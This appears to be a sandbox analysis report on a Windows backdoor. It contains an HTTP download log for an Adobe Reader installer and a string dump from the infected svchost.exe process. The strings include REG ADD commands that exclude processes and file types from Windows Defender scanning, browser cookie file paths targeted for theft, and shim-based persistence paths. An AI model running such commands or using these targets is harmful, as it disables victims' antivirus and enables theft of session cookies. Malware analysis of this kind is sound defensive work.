Date: Tue, 26 Jul 2016 16:17:16 GMT
Content-Range: bytes 34603008-35651583/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=35651584-36700159
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:18 GMT
Content-Range: bytes 35651584-36700159/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=36700160-37748735
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:18 GMT
Content-Range: bytes 36700160-37748735/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=37748736-38797311
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:19 GMT
Content-Range: bytes 37748736-38797311/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=38797312-39845887
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:19 GMT
Content-Range: bytes 38797312-39845887/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=39845888-40894463
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:20 GMT
Content-Range: bytes 39845888-40894463/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=40894464-41943039
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:20 GMT
Content-Range: bytes 40894464-41943039/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=41943040-42991615
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:20 GMT
Content-Range: bytes 41943040-42991615/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=42991616-44040191
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:21 GMT
Content-Range: bytes 42991616-44040191/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=44040192-45088767
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:22 GMT
Content-Range: bytes 44040192-45088767/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=45088768-46137343
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:22 GMT
Content-Range: bytes 45088768-46137343/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=46137344-47185919
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:23 GMT
Content-Range: bytes 46137344-47185919/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=47185920-48234495
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:23 GMT
Content-Range: bytes 47185920-48234495/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=48234496-49283071
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:24 GMT
Content-Range: bytes 48234496-49283071/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=49283072-50331647
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:24 GMT
Content-Range: bytes 49283072-50331647/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=50331648-51380223
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:25 GMT
Content-Range: bytes 50331648-51380223/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=51380224-52428799
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:25 GMT
Content-Range: bytes 51380224-52428799/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=52428800-53477375
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:26 GMT
Content-Range: bytes 52428800-53477375/53784984
Content-Length: 1048576
Connection: keep-alive
<<< skipped >>>
GET /pub/adobe/reader/win/10.x/10.1.2/en_US/AdbeRdr1012_en_US.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Accept-Encoding: gzip, deflate
Host: ardownload.adobe.com
Connection: keep-alive
Range: bytes=53477376-53784983
HTTP/1.1 206 Partial Content
Server: Apache
Last-Modified: Tue, 03 Jan 2012 17:57:35 GMT
ETag: "334b198-4b5a36f1841c0"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Tue, 26 Jul 2016 16:17:26 GMT
Content-Range: bytes 53477376-53784983/53784984
Content-Length: 307608
Connection: keep-alive
<<< skipped >>>
Map
The Backdoor connects to the servers at the following location(s):
Strings from Dumps
svchost.exe_1980:
.text
.text
`.data
`.data
.rsrc
.rsrc
ADVAPI32.dll
ADVAPI32.dll
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
RPCRT4.dll
RPCRT4.dll
NETAPI32.dll
NETAPI32.dll
ole32.dll
ole32.dll
ntdll.dll
ntdll.dll
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
GetProcessHeap
GetProcessHeap
NtOpenKey
NtOpenKey
svchost.pdb
svchost.pdb
\PIPE\
\PIPE\
Software\Microsoft\Windows NT\CurrentVersion\Svchost
Software\Microsoft\Windows NT\CurrentVersion\Svchost
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
5.1.2600.5512 (xpsp.080413-2111)
5.1.2600.5512 (xpsp.080413-2111)
svchost.exe
svchost.exe
Windows
Windows
Operating System
Operating System
5.1.2600.5512
5.1.2600.5512
svchost.exe_1980_rwx_002B0000_00001000:
|C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\csslisog.exe
|C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\csslisog.exe
svchost.exe_1980_rwx_15190000_0003D000:
`.rsrc
`.rsrc
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
Gh.logWj
Gh.logWj
h.logPj
h.logPj
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
PeekNamedPipe
PeekNamedPipe
SetNamedPipeHandleState
SetNamedPipeHandleState
WaitNamedPipeA
WaitNamedPipeA
kernel32.dll
kernel32.dll
ExitWindowsEx
ExitWindowsEx
user32.dll
user32.dll
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyA
advapi32.dll
advapi32.dll
modules.dll
modules.dll
GetWindowsDirectoryA
GetWindowsDirectoryA
{X-X-X-X-XX}
{X-X-X-X-XX}
ntdll.dll
ntdll.dll
shlwapi.dll
shlwapi.dll
SHDeleteKeyA
SHDeleteKeyA
SOFTWARE\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion
shell32.dll
shell32.dll
%CommonProgramFiles%
%CommonProgramFiles%
\/*.*
\/*.*
\\.\pipe\
\\.\pipe\
VWRQRh.exe
VWRQRh.exe
h.exe
h.exe
ws2_32.dll
ws2_32.dll
RegCreateKeyExA
RegCreateKeyExA
ShellExecuteA
ShellExecuteA
gdi32.dll
gdi32.dll
ole32.dll
ole32.dll
rmnsoft.dll
rmnsoft.dll
google.com:80
google.com:80
bing.com:80
bing.com:80
yahoo.com:80
yahoo.com:80
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Windows Defender
Windows Defender
Software\Microsoft\Windows\CurrentVersion\Policies
Software\Microsoft\Windows\CurrentVersion\Policies
Software\Microsoft\Windows\CurrentVersion\Policies\Associations
Software\Microsoft\Windows\CurrentVersion\Policies\Associations
Software\Microsoft\Windows\CurrentVersion\policies\system
Software\Microsoft\Windows\CurrentVersion\policies\system
\ SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
\ SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
"ntdll.dll
"ntdll.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
HTTP/*.*
HTTP/*.*
/HTTPMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
/HTTPMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Referer: %s
Referer: %s
Content-Type: multipart/form-data; boundary=%s
Content-Type: multipart/form-data; boundary=%s
Content-Length: %d
Content-Length: %d
Content-Disposition: form-data; name="%s"
Content-Disposition: form-data; name="%s"
--%s--
--%s--
%s /%s HTTP/1.1
%s /%s HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
%sAccept-Language: %s
%sAccept-Language: %s
HTTP/1.x 301 Moved Permanently
HTTP/1.x 301 Moved Permanently
Server: Apache/2.2.14
Server: Apache/2.2.14
gdiplus.dll
gdiplus.dll
GdiplusShutdown
GdiplusShutdown
\\.\131D2408D44C4f47AC647AB96987D4D5
\\.\131D2408D44C4f47AC647AB96987D4D5
\Google\Chrome\User Data\Default\Cookies
\Google\Chrome\User Data\Default\Cookies
\Google\Chrome\User Data\Default\Extension Cookies
\Google\Chrome\User Data\Default\Extension Cookies
%APPDATA%\Apple Computer\Safari\Cookies\Cookies.plist
%APPDATA%\Apple Computer\Safari\Cookies\Cookies.plist
%APPDATA%\Mozilla\Firefox\
%APPDATA%\Mozilla\Firefox\
%WinDir%\Application Data\Mozilla\Firefox\
%WinDir%\Application Data\Mozilla\Firefox\
profiles.ini
profiles.ini
Profile%d
Profile%d
\cookies.txt
\cookies.txt
\cookies.sqlite
\cookies.sqlite
%APPDATA%\Opera\
%APPDATA%\Opera\
\profile\cookies4.dat
\profile\cookies4.dat
\cookies4.dat
\cookies4.dat
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Opera.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Opera.exe
FireFox Cookies\Profile %d\cookies.txt
FireFox Cookies\Profile %d\cookies.txt
FireFox Cookies\Profile %d\cookies.sqlite
FireFox Cookies\Profile %d\cookies.sqlite
Chrome\Cookies
Chrome\Cookies
Chrome\Extension Cookies
Chrome\Extension Cookies
Opera\Profile %d\cookies4.dat
Opera\Profile %d\cookies4.dat
Safari\Cookies.plist
Safari\Cookies.plist
1etexec
1etexec
complete.dat
complete.dat
SRQVWh.exe
SRQVWh.exe
h.exeVj
h.exeVj
h.exeh$~
h.exeh$~
tvh.exe
tvh.exe
PSSSSSSh
PSSSSSSh
More information: hXXp://VVV.ibsensoftware.com/
More information: hXXp://VVV.ibsensoftware.com/
Advapi32.dll
Advapi32.dll
RegDeleteKeyExA
RegDeleteKeyExA
com.%s.sdb
com.%s.sdb
%s\cmd.%s.bat
%s\cmd.%s.bat
start "" "%s"
start "" "%s"
"%%windir%%\%s\iscsicli.exe"
"%%windir%%\%s\iscsicli.exe"
/q "%s"
/q "%s"
\system32\sdbinst.exe"
\system32\sdbinst.exe"
SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB\{f48a0c57-7c48-461c-9957-ab255ddc986e}\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB\{f48a0c57-7c48-461c-9957-ab255ddc986e}\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\iscsicli.exe\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\iscsicli.exe\
\AppPatch\Custom\{f48a0c57-7c48-461c-9957-ab255ddc986e}.sdb
\AppPatch\Custom\{f48a0c57-7c48-461c-9957-ab255ddc986e}.sdb
/q /u "%s"
/q /u "%s"
SOFTWARE\Microsoft\Windows NT\CurrentVersion\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\
SOFTWARE\Microsoft\Updates\Windows XP\SP4
SOFTWARE\Microsoft\Updates\Windows XP\SP4
SOFTWARE\Microsoft\Updates\Windows XP\SP3
SOFTWARE\Microsoft\Updates\Windows XP\SP3
SOFTWARE\Microsoft\Updates\Windows XP\SP10
SOFTWARE\Microsoft\Updates\Windows XP\SP10
SOFTWARE\Microsoft\Updates\Windows XP\SP0
SOFTWARE\Microsoft\Updates\Windows XP\SP0
SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages
SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages
:Zone.Identifier:$DATA
:Zone.Identifier:$DATA
:Zone.Identifier
:Zone.Identifier
svchost.exe
svchost.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v svchost.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v svchost.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v consent.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v consent.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v rundll32.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v rundll32.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v spoolsv.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v spoolsv.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v explorer.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v explorer.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v rgjdu.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v rgjdu.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v afwqs.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes " /v afwqs.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions " /v *.tmp /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions " /v *.tmp /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions " /v *.dll /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions " /v *.dll /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions " /v *.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions " /v *.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v svchost.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v svchost.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v consent.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v consent.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v rundll32.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v rundll32.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v spoolsv.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v spoolsv.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v explorer.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v explorer.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v rgjdu.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v rgjdu.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v afwqs.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes " /v afwqs.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions " /v *.tmp /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions " /v *.tmp /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions " /v *.dll /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions " /v *.dll /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions " /v *.exe /t REG_DWORD /d 0
REG ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions " /v *.exe /t REG_DWORD /d 0
spoolsv.exe
spoolsv.exe
..\p.exe
..\p.exe
CheckBypassed ok
CheckBypassed ok
loader.exe
loader.exe
_CheckBypassed@0
_CheckBypassed@0
|GetWindowsDirectoryA
|GetWindowsDirectoryA
\/{X-X-X-X-XX}
\/{X-X-X-X-XX}
|ZwDelayExecution
|ZwDelayExecution
%ProgramFiles%\Internet Explorer\iexplore.exe
%ProgramFiles%\Internet Explorer\iexplore.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
http\shell\open\command
http\shell\open\command
chrome.exe
chrome.exe
opera.exe
opera.exe
cmd.exe
cmd.exe
/C ""%s"" %s
/C ""%s"" %s
/C ""%s""
/C ""%s""
user32.DLL
user32.DLL
p.exe
p.exe
Rapport
Rapport
1onsent.exe
1onsent.exe
&.bAp
&.bAp
%Program Files%\Internet Explorer\iexplore.exe
%Program Files%\Internet Explorer\iexplore.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\csslisog.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\csslisog.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\p.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\p.exe
GetProcessHeap
GetProcessHeap
RegEnumKeyA
RegEnumKeyA
RegOpenKeyA
RegOpenKeyA
ShellExecuteExA
ShellExecuteExA
SetWindowsHookExA
SetWindowsHookExA
UnhookWindowsHook
UnhookWindowsHook
EnumWindows
EnumWindows
.rdata
.rdata
.rsrc
.rsrc
